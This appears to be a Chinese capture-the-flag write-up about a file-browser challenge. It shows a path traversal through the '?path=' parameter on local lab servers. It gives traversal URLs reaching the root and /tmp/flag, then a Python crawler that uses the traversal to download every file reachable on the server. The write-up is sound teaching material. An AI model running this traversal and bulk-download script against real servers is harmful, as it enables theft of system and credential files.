
垫刀之路04_一个文件浏览器

网络安全

垫刀之路04: 一个文件浏览器

先点一个路径

http://127.0.0.1:7489/?path=/src

`?path=` 参数存在路径遍历漏洞:尝试访问 `?path=../`,可行。输入足够多的 `../` 即可到达根目录,例如 http://127.0.0.1:7489/?path=../../../../ 。这说明服务端把 path 直接拼进了文件路径,很可能既没有做规范化,也没有把结果限制在预期目录之内。

有一个flag

文件内容:
flag 不在这里哦,你可以换个地方找找。
位置不远,耐心一点

flag在127.0.0.1:1943/?path=../../../../tmp/flag

很难找

import os
import requests
from urllib.parse import urljoin

# Crawl entry point on the lab server; the ../ chain in ?path= climbs out of the served directory
base_url = "http://127.0.0.1:1943/?path=../../../.."

# URLs that have already been requested, so that no listing is crawled twice
visited_urls: set[str] = set()

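# Download one file
def download_file(url, path):
    """Fetch *url* and write the response body to the local file *path*.

    Best-effort: network/HTTP failures and local write failures are printed
    and the function returns None in every case. An empty response body is
    reported and no file is created.

    *path* is opened exactly as given. A caller that derives it from
    server-supplied data (for example a link in a fetched page) must reduce
    it to a safe local name before calling.
    """
    try:
        response = requests.get(url, timeout=10)  # give up after 10 seconds
        response.raise_for_status()  # turn 4xx/5xx answers into an exception

        body = response.content
        if not body:
            print(f"Warning: Empty content for {url}, skipping download.")
            return

        # A bare file name has an empty dirname and os.makedirs('') raises,
        # so only create the parent when there is one.
        parent = os.path.dirname(path)
        if parent:
            os.makedirs(parent, exist_ok=True)
        with open(path, 'wb') as f:
            f.write(body)
        print(f"Downloaded {url} to {path}")
    except requests.exceptions.Timeout:
        print(f"Request timed out for {url}")
    except requests.exceptions.RequestException as e:
        print(f"An error occurred while downloading {url}: {e}")
    except OSError as e:
        # Local failure (path is a directory, not writable, disk full, ...).
        # Reported like the network errors so one bad name does not abort
        # the caller's whole run.
        print(f"Could not write {path}: {e}")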

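# Walk a directory listing recursively
def traverse(url):
    """Crawl the directory-listing page at *url* and save the files it links to.

    Every ``<a href>`` on the page is resolved against *url*. A link whose
    text contains ' (Directory)' is crawled recursively; any other link is
    passed to download_file() and saved in the current directory under the
    last path component of its URL.

    The hrefs come from the server and are treated as untrusted:
    - links that resolve to another scheme or host:port are skipped, so the
      crawl stays on the server it was started against;
    - only the final path component is used locally, and links whose final
      component is empty, '.' or '..' are skipped because they cannot name
      a file.

    Files from different directories that share a name overwrite each other.
    Recursion depth follows the nesting of the listing. URLs already in
    visited_urls are not requested again.
    """
    # Function-scope import, matching the bs4 import below.
    from urllib.parse import urlsplit

    if url in visited_urls:
        return
    visited_urls.add(url)

    try:
        response = requests.get(url, timeout=10)  # give up after 10 seconds
        response.raise_for_status()  # turn 4xx/5xx answers into an exception

        from bs4 import BeautifulSoup
        soup = BeautifulSoup(response.text, 'html.parser')
        origin = urlsplit(url)[:2]  # (scheme, netloc) of the page being parsed
        for link in soup.find_all('a', href=True):
            full_url = urljoin(url, link['href'])

            if urlsplit(full_url)[:2] != origin:
                print(f"Skipping off-site link {full_url}")
                continue

            if ' (Directory)' in link.text:
                traverse(full_url)
                continue

            local_name = os.path.basename(full_url)
            if local_name in ('', '.', '..'):
                print(f"Skipping {full_url}: no usable file name")
                continue
            download_file(full_url, os.path.join('.', local_name))
    except requests.exceptions.Timeout:
        print(f"Request timed out for {url}")
    except requests.exceptions.RequestException as e:
        print(f"An error occurred while traversing {url}: {e}")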

# Start the crawl at the configured entry URL
traverse(url=base_url)

运行后,会把所有文件下载到当前目录,大约需要 20 分钟;下载完成后再在其中查找 flag。注意脚本只按文件名保存,不同目录下的同名文件会互相覆盖。